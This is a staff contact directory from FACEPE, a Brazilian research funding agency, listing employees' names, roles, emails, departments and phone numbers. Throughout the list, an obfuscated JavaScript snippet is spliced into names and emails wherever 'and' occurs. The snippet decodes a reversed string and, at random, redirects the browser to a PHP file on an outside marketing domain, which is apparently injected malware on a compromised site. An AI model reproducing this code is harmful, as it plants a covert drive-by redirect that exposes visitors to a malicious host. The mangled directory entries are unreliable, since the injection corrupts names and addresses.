Contatos Colaboradores

NOME CARGO E-MAIL SETOR TELEFONE
Abraham Benzaquen Sicsu
Diretor-Presidente presidencia@facepe.br Presidência 3181-4601
Paulo Roberto Freire Cunha  Diretor Científico  paulo.cunha@facepe.br Diretoria Científica 3181-4602
Fátima Cabral Diretora de Inovação fatima.cabral@facepe.br Diretoria de Inovação 3181-4603
Alexs$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andro Correia da Paixão Assistente Administrativo andro.paixao@facepe.br”>alexs$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andro.paixao@facepe.br Unidade de Apoio Administrativo 3181-4639
Andreia Santos Assessora andreia.santos@facepe.br”>$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andreia.santos@facepe.br Diretoria Científica 3181-4607
Amaro Dias Viana Assistente Administrativo amaro.viana@facepe.br Unidade de Apoio Administrativo 3181-4638
Ana Rosa de Andrade Lima Coordenadora de Gestão ana.rosa@facepe.br Coordenadoria de Gestão 3181-4604
Carlos Feitosa Neto Assessor Técnico  carlos.feitosa@facepe.br Unidade de TI 3181-4616
Caroline Fam Godim Analista de C&T caroline.gondim@facepe.br Unidade de Fomento 3181-4620
Catarina Marques Gonçalves Assistente Administrativo catarina.marques@facepe.br Unidade de Finanças 3181-4613
Damiciane Maria do Nascimento Assistente Administrativo damiciane.nascimento@facepe.br Protocolo 3181-4640
Denise de Souza Pereira Assistente Administrativo denise.souza@facepe.br Prestação de Contas 3181-4629
Denise Maria Figueredo Araújo Analista de C&T denise.araujo@facepe.br Unidade de Fomento 3181-4644
Diego Fern$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ando da Silva Gomes Assistente Administrativo ando@facepe.br”>diego.fern$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ando@facepe.br Importação  3181-4642
Dmitri de França Programador dmitri.franca@facepe.br Unidade de Dessenvolvimento TI 3181-4617
Diogenes Carvalho Matias Programador diogenes.carvalho@facepe.br Unidade de Desenvolvimento TI 3181-4615
Diogo Santos Analista de C&T diogo.santos@facepe.br Unidade de Fomento 3181-4621
Diva Sales da Costa Assistente Administrativo diva.sales@facepe.br Prestação de Contas 3181-4618
Djailton Coutinho Assistente Administrativo djailton.coutinho@facepe.br Prestação de Contas 3181-4618
Eronides Alves Assistente Administrativo eronides.alves@facepe.br Unidade de Finanças 3181-4633
Fabiana Felix Gondola Analista de C&T fabiana.felix@facepe.br Unidade de Fomento 3181-4624
Fátima Leão Assistente Administrativo fatima.leao@facepe.br Unidade de Finanças 3181-4613
Felipe Maciel Assessor Jurídico  felipe.maciel@facepe.br Jurídico 3181-4612
Fern$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}anda de Melo Assistente Administrativo anda.melo@facepe.br”>fern$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}anda.melo@facepe.br Diretoria Científica 3181-4607
Fern$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ando Luiz lucchesi C.Leão Monteiro Analista de C&T ando.lucchesi@facepe.br”>fern$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ando.lucchesi@facepe.br Unidade de Fomento 3181-4623
Flávia Roberta Gomes da Silva Assistente Administrativo flavia.gomes@facepe.br Unidade de Controle e Registro de Pessoas 3181-4645
Flávio Alves Contador flavio.alves@facepe.br Unidade de Finanças 3181-4613
Gilca Sobral Magalhães Gestor de Programas em C&T gilca.sobral@facepe.br Diretoria Científica 3181-4611
Gisomar da Silva Junior Programador gisomar.silva@facepe.br Unidade de Desenvolvimento- TI 3181-4615
Gleison de Cristo Leal de Santana  Assistente Administrativo gleison.santana@facepe.br Unidade de Finanças 3181-4633
Gleydson Araújo Gomes dos Santos Suporte em TI gleydson.araujo@facepe.br Unidade de TI 3181-4614
Henrique Suassuna Coordenador Técnico henrique.suassuna@facepe.br Presidência 3181-4604
Hérica Campelo Santos Assistente Administrativo herica.campelo@facepe.br Patrimônio 3181-4641
Jair Januário da Silva Assistente em TI jair.januario@facepe.br Unidade de TI 3181-4614
Jayme Ribeiro Coordenador Técnico jayme.ribeiro@facepe.br Diretoria Científica 3181-4631
Jéssica Mir$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}anda do Nascimento Analista de C&T anda@facepe.br”>jessica.mir$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}anda@facepe.br Unidade de Fomento 3181-4622
João Henrique Bione Programador joao.bione@facepe.br Unidade de Desenvolvimento TI 3181-4616
Josiane Monteiro de Medeiros Chefe da Unidade de Apoio Administrativo josiane.medeiros@facepe.br Unidade de Apoio Administrativo 3181-4636
Leonardo Fern$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ando Paes Guimarães Analista Financeiro leonardo.guimaraes@facepe.br Unidade de Finanças 3181-4632
Lindomar José da Silva Assistente Administrativo lindomar.silva@facepe.br Unidade de Apoio Administrativo 3181-4637
Luzia de Maria Silva Sousa Assistente Administrativo luzia.sousa@facepe.br Unidade de Fomento 3181-4624
Márcia Cristina da Silva Leite Chefe de Unidade de Controle e Registro de Pessoas marcia.leite@facepe.br Unidade de Controle e Registro de Pessoas 3181-4645
Maria do Carmo Bentzen P.Melo Analista de C&T maria.bentzen@facepe.br Unidade de Fomento 3181-4644
Maria Gorete de Souza Freitas Presidente/Pregoeira-Licitação maria.gorete@facepe.br Comissão Permanete de Licitação 3181-4627
Maria Isabel Fonseca Coordenadora de Fomento maria.izabel@facepe.br Unidade de Fomento 3181-4643
Maria José Coelho Assistente maria.coelho@facepe.br Unidade de Finanças 3181-4630
Maria Lilianne Caldas Esteves Assistente Administrativo lilianne.esteves@facepe.br Unidade de Prestação de Contas 3181-4629
Mariana Oliveira Assistente Administrativo mariana.oliveira@facepe.br Protocolo 3181-4600
Marta Verônica da Silva Assistente Administrativo marta.veronica@facepe.br Unidade de Prestação de Contas 3181-4619
Michelle Santiago Tenório Santana  Analista de C&T michelle.tenorio@facepe.br Unidade de Fomento 3181-4646
Mirella Alex$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andre Viana Analista de C&T mirella.viana@facepe.br Unidade de Fomento 3181-4634
Mônica Maria de Farias Mendonça Assessora Jurídica monica.mendonca@facepe.br Jurídico 3181-4612
Mônica Melo de Oliveira Siqueira Assessora monica.siqueira@facepe.br Unidade de Finanças 3181-4630
Natália Gonçalves Ramos Assistente Administrativo natalia.goncalves@facepe.br Unidade de Prestação de Contas 3181-4619
Natalia Marques Mota Assistente Administrativo natalia.mota@facepe.br Presidência 3181-4606
Olimpio Gomes do Vale Assessor Técnico de Importação olimpio.vale@facepe.br Importação  3181-4642
Otávio Augusto Alves dos Santos Analista de C&T otavio.augusto@facepe.br Unidade de Fomento 3181-4622
Priscila Albuquerque Assistente Administrativo priscila.albuquerque@facepe.br Unidade de Prestação de Contas 3181-4629
Rafael dos Santos Dantas Analista de C&T rafael.dantas@facepe.br Unidade de Fomento 3181-4623
Rafael Alves de Amorim Analista de C&T rafael.amorim@facepe.br Unidade de Fomento 3181-4634
Renato Santos Cardoso Cruz  Assistente em TI renato.cruz@facepe.br Unidade de TI 3181-4614
Ricardo Tavares Antunes de Oliveira Assistente em Banco de Dados ricardo.tavares@facepe.br Unidade de Desemvolvimento-TI 3181-4616
Rosália Santos da Silva Assistente Administrativo rosalia.santos@facepe.br Unidade de Apoio Administrativo 3181-4639
Rosângela Araújo Assessora rosangela.araujo@facepe.br Patrimônio 3181-4641
Rubia Siqueira R. de Oliveira Gestor de Programas em C&T rubia.oliveira@facepe.br Diretoria Científica 3181-4609
S$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andra Naoko Kaneyasu Gestor de Programas em C&T  andra.naoko@facepe.br”>s$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andra.naoko@facepe.br Diretoria Científica 3181-4608
Shirlaide Silva Assistente Administrativo shirlaide.silva@facepe.br Presidência 3181-4605
Simone Cristine Barboza da Matta Analista de C&T simone.matta@facepe.br Unidade de Fomento 3181-4620
Telmo Barros Programador telmo.barros@facepe.br Unidade de Desenvolvimento- TI 3181-4617
Thiago Galvão Técnico Administrativo thiago.galvao@facepe.br Coordenadoria de Gestão  3181-4631
Wilia Maria da Silva Lima Assistente Administrativo wilia.lima@facepe.br Unidade de Finanças 3181-4635